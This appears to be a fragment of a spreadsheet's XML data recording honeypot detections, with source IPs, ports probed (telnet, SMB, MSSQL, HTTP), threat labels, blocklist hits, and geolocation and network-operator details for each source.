    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2478"/>
    <x v="2478"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-09T09:28:37"/>
    <d v="2025-04-09T09:28:37"/>
    <d v="2025-04-09T09:28:37"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="TN"/>
    <s v="Tamil Nadu"/>
    <s v="Tuticorin"/>
    <s v="Eral"/>
    <s v="1272027"/>
    <s v="NA"/>
    <s v="8.62584"/>
    <s v="78.0228"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="consumer"/>
    <s v="BB Multiplay"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75c1:453a"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2479"/>
    <x v="2479"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-09T09:24:21"/>
    <d v="2025-04-08T20:40:18"/>
    <d v="2025-04-09T09:24:21"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_HC1"/>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2007-08-01"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75c0:2571"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2480"/>
    <x v="2480"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-09T09:22:55"/>
    <d v="2025-04-09T09:22:55"/>
    <d v="2025-04-09T09:22:55"/>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e:3e32"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2481"/>
    <x v="2481"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-09T08:57:18"/>
    <d v="2024-05-29T09:33:50"/>
    <d v="2025-04-09T08:57:18"/>
    <n v="117"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SMB_H24&amp;&amp;SMA-LAB_DNS_H10&amp;&amp;SMA-LAB_MT-CPA_H18&amp;&amp;SMA-LAB_SMB_H29&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H29&amp;&amp;SMA-LAB_MSSQL_H13"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;445&amp;&amp;53&amp;&amp;2817&amp;&amp;1433&amp;&amp;3306"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="TN"/>
    <s v="Tamil Nadu"/>
    <s v="Namakkal"/>
    <s v="Namakkal"/>
    <s v="1262039"/>
    <s v="637001"/>
    <s v="11.2828"/>
    <s v="78.2313"/>
    <s v="134032"/>
    <s v="INFONET COMM ENTERPRISES"/>
    <s v="Infonet Comm Enterprises"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="2015-05-19"/>
    <s v="ICENET"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_MYSQL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:6739:9687"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2482"/>
    <x v="2482"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-09T08:24:57"/>
    <d v="2025-04-09T07:14:55"/>
    <d v="2025-04-09T08:24:57"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="HK"/>
    <s v="Hong Kong"/>
    <s v="KKC"/>
    <s v="Kowloon City"/>
    <s v="NA"/>
    <s v="Kowloon City"/>
    <s v="1819607"/>
    <s v="NA"/>
    <s v="22.3144"/>
    <s v="114.22"/>
    <s v="17924"/>
    <s v="Smartone Mobile communications Limited"/>
    <s v="Smartone Mobile communications Limited"/>
    <s v="cellular"/>
    <s v="Smartone Mobile communications Limited"/>
    <s v="2010-10-08"/>
    <s v="SMARTMOBILE-AS-AP"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3182:9953"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2483"/>
    <x v="2483"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-09T08:19:55"/>
    <d v="2025-04-09T08:19:55"/>
    <d v="2025-04-09T08:19:55"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="73"/>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7:163b"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2484"/>
    <x v="2484"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-09T08:08:28"/>
    <d v="2025-04-08T20:06:49"/>
    <d v="2025-04-09T08:08:28"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H15"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TH"/>
    <s v="Thailand"/>
    <s v="10"/>
    <s v="Bangkok"/>
    <s v="Bang Sue"/>
    <s v="Bang Sue"/>
    <s v="6845329"/>
    <s v="NA"/>
    <s v="13.81"/>
    <s v="100.537"/>
    <s v="23969"/>
    <s v="TOT Public Company Limited"/>
    <s v="TOT Public Company Limited"/>
    <s v="residential"/>
    <s v="TOT Public Company Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:10a:d32f"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2485"/>
    <x v="2485"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-09T08:06:43"/>
    <d v="2025-04-07T12:36:58"/>
    <d v="2025-04-09T08:06:43"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H47"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="VN"/>
    <s v="Vietnam"/>
    <s v="20"/>
    <s v="Thái Bình Province"/>
    <s v="Tiền Hải District"/>
    <s v="Tiền Hải"/>
    <s v="1572508"/>
    <s v="NA"/>
    <s v="20.4056"/>
    <s v="106.504"/>
    <s v="7552"/>
    <s v="Viettel Group"/>
    <s v="Viettel Corporation"/>
    <s v="business"/>
    <s v="Viettel Group"/>
    <s v="2007-05-18"/>
    <s v="VIETTEL-VN"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:746b:7e41"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2486"/>
    <x v="2486"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-09T07:49:48"/>
    <d v="2025-04-08T22:02:50"/>
    <d v="2025-04-09T07:49:48"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="TN"/>
    <s v="Tamil Nadu"/>
    <s v="Salem"/>
    <s v="Omalur"/>
    <s v="1261049"/>
    <s v="NA"/>
    <s v="11.741"/>
    <s v="78.0456"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="business"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="2008-03-19"/>
    <s v="MTNL"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7838:e536"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2487"/>
    <x v="2487"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-09T07:15:59"/>
    <d v="2025-02-21T00:33:54"/>
    <d v="2025-04-09T07:15:59"/>
    <n v="4"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="medium"/>
    <s v="SMA-LAB_SMB_H45&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="445&amp;&amp;1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="HK"/>
    <s v="Hong Kong"/>
    <s v="HSO"/>
    <s v="Southern"/>
    <s v="NA"/>
    <s v="Aberdeen"/>
    <s v="1819757"/>
    <s v="NA"/>
    <s v="22.2491"/>
    <s v="114.165"/>
    <s v="55361"/>
    <s v="Lucky Tone Communications Ltd"/>
    <s v="Connect Communications (Pvt.) Limited"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="2012-02-14"/>
    <s v="LUCKYTONE-NET-HK"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_SMB:Incoming connection (103.6.6.91,59263)}&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:6706:65b"/>
    <s v="C-I"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2488"/>
    <x v="2488"/>
    <s v="114-33-7-225.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-09T07:00:56"/>
    <d v="2024-03-07T23:07:00"/>
    <d v="2025-04-09T07:00:56"/>
    <n v="1575"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H2&amp;&amp;SMA-LAB_HTTP_H11&amp;&amp;SMA-LAB_HTTP_H13&amp;&amp;SMA-LAB_HTTP_H14&amp;&amp;SMA-LAB_HTTP_H18&amp;&amp;SMA-LAB_HTTP_H16&amp;&amp;SMA-LAB_HTTP_H3&amp;&amp;SMA-LAB_MT-CPA_H36&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_MT-CPA_H7&amp;&amp;SMA-LAB_HTTP_H8&amp;&amp;SMA-LAB_HTTP_H17&amp;&amp;SMA-LAB_HTTP_H7&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_MT-CPA_H44&amp;&amp;SMA-LAB_TELNET_H31"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;26988&amp;&amp;19467&amp;&amp;23&amp;&amp;58419&amp;&amp;28483&amp;&amp;9100&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login&amp;&amp;connection&amp;&amp;NA&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.93.37.45:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.233.76.135:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7221:7e1"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2489"/>
    <x v="2489"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-09T06:59:11"/>
    <d v="2025-04-08T06:56:51"/>
    <d v="2025-04-09T06:59:11"/>
    <n v="5"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H18"/>
    <s v="1433&amp;&amp;445"/>
    <s v="True"/>
    <s v="{'z.mailspike.net': ['unknown']}"/>
    <n v="32"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="ID"/>
    <s v="Indonesia"/>
    <s v="LA"/>
    <s v="Lampung"/>
    <s v="Kota Metro"/>
    <s v="Metro"/>
    <s v="1635283"/>
    <s v="NA"/>
    <s v="-5.15688"/>
    <s v="105.304"/>
    <s v="152382"/>
    <s v="PT Kartika Siger Network"/>
    <s v="PT Kartika Siger Network"/>
    <s v="business"/>
    <s v="PT Kartika Siger Network"/>
    <s v="2024-02-07"/>
    <s v="IDNIC-KSN-ID"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (157.15.166.67,50262)}&amp;&amp;{Data_SMB:Incoming connection (157.15.166.67,50547)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:9d0f:a643"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2490"/>
    <x v="2490"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-09T06:43:02"/>
    <d v="2025-04-09T06:43:02"/>
    <d v="2025-04-09T06:43:02"/>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dd:96d"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2491"/>
    <x v="2491"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-09T06:37:54"/>
    <d v="2025-04-09T06:34:43"/>
    <d v="2025-04-09T06:37:54"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="ID"/>
    <s v="Indonesia"/>
    <s v="JK"/>
    <s v="Jakarta"/>
    <s v="Kota Administrasi Jakarta Pusat"/>
    <s v="Jakarta Pusat"/>
    <s v="6754874"/>
    <s v="NA"/>
    <s v="-6.18104"/>
    <s v="106.826"/>
    <s v="7713"/>
    <s v="Telekomunikasi Indonesia (PT)"/>
    <s v="PT. TELKOM INDONESIA"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="2011-01-14"/>
    <s v="TLKM_BB_SERVICE_36_76_DIVRE1"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:244c:63bd"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2492"/>
    <x v="2492"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-09T06:37:12"/>
    <d v="2025-04-09T06:37:12"/>
    <d v="2025-04-09T06:37:12"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Dakshin Kannad"/>
    <s v="Mangaluru"/>
    <s v="1263780"/>
    <s v="575001"/>
    <s v="12.9141"/>
    <s v="74.856"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="consumer"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75cd:9f01"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2493"/>
    <x v="2493"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-09T06:35:39"/>
    <d v="2025-04-08T11:54:42"/>
    <d v="2025-04-09T06:35:39"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H5"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="VN"/>
    <s v="Vietnam"/>
    <s v="HN"/>
    <s v="Hanoi"/>
    <s v="Hoan Kiem"/>
    <s v="Hanoi"/>
    <s v="1581130"/>
    <s v="NA"/>
    <s v="21.0278"/>
    <s v="105.834"/>
    <s v="7552"/>
    <s v="Viettel Group"/>
    <s v="Viettel Corporation"/>
    <s v="residential"/>
    <s v="Viettel Group"/>
    <s v="2007-05-18"/>
    <s v="VIETTEL-VN"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7468:d257"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2494"/>
    <x v="2494"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-09T06:24:53"/>
    <d v="2025-02-27T16:55:27"/>
    <d v="2025-04-09T06:24:53"/>
    <n v="6"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="medium"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H6"/>
    <s v="1433&amp;&amp;445"/>
    <s v="True"/>
    <s v="{'z.mailspike.net': ['unknown']}"/>
    <n v="32"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="ID"/>
    <s v="Indonesia"/>
    <s v="JB"/>
    <s v="West Java"/>
    <s v="Kota Cirebon"/>
    <s v="Cirebon"/>
    <s v="1646170"/>
    <s v="NA"/>
    <s v="-6.73202"/>
    <s v="108.552"/>
    <s v="23756"/>
    <s v="PADINET - Padi Internet"/>
    <s v="PADINET - Padi Internet"/>
    <s v="business"/>
    <s v="Padinet"/>
    <s v="2003-04-23"/>
    <s v="PADINET-ID"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (202.6.226.18,56603)}&amp;&amp;{Data_SMB:Incoming connection (202.6.226.18,56865)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:ca06:e212"/>
    <s v="C-I"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2495"/>
    <x v="2495"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-09T06:15:45"/>
    <d v="2025-04-09T06:14:40"/>
    <d v="2025-04-09T06:15:45"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="DO"/>
    <s v="Dominican Republic"/>
    <s v="01"/>
    <s v="Nacional"/>
    <s v="Santo Domingo De Guzmán"/>
    <s v="Santo Domingo"/>
    <s v="3492908"/>
    <s v="NA"/>
    <s v="18.4823"/>
    <s v="-69.9344"/>
    <s v="6400"/>
    <s v="Compañía Dominicana de Teléfonos S. A."/>
    <s v="Compañía Dominicana de Teléfonos S. A."/>
    <s v="business"/>
    <s v="Compañía Dominicana de Teléfonos S. A"/>
